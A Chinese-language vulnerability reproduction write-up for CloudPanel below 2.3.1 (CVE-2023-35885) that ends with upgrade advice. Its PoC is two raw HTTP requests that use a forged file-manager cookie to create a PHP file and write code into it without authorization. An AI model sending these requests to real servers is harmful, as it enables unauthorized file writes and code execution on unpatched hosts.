0x00写在前面

本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!

0x01漏洞介绍

CloudPanel是CloudPanel开源的一款免费软件。用于配置和管理服务器。

CloudPanel 2.3.1之前版本存在安全漏洞,该漏洞源于具有不安全的文件管理器cookie身份验证。

0x02影响版本

CloudPanel < 2.3.1

0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现

 POC

1、测试文件管理接口

/file-manager/

2、未授权创建文件

POST /file-manager/backend/makefile HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 48
Content-Type: application/x-www-form-urlencoded
Cookie: clp-fm=ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY=
Accept-Encoding: gzip, deflate

id=/htdocs/app/files/public/&name=K98ktgY3yL.php

3、写入代码

POST /file-manager/backend/text HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 95
Content-Type: application/x-www-form-urlencoded
Cookie: clp-fm=ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY=
Accept-Encoding: gzip, deflate

id=/htdocs/app/files/public/K98ktgY3yL.php&content=<?php echo "2Zn1M6zckpbKy6m0KsenE2zNV1p"; ?>

4、成功解析文件

3.nuclei工具测试(漏洞存在)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

更新至最新版本2.3.1

https://www.cloudpanel.io/docs/v2/changelog/
https://github.com/datackmy/FallingSkies-CVE-2023-35885
https://github.com/cloudpanel-io/cloudpanel-ce/releases/tag/v2.3.1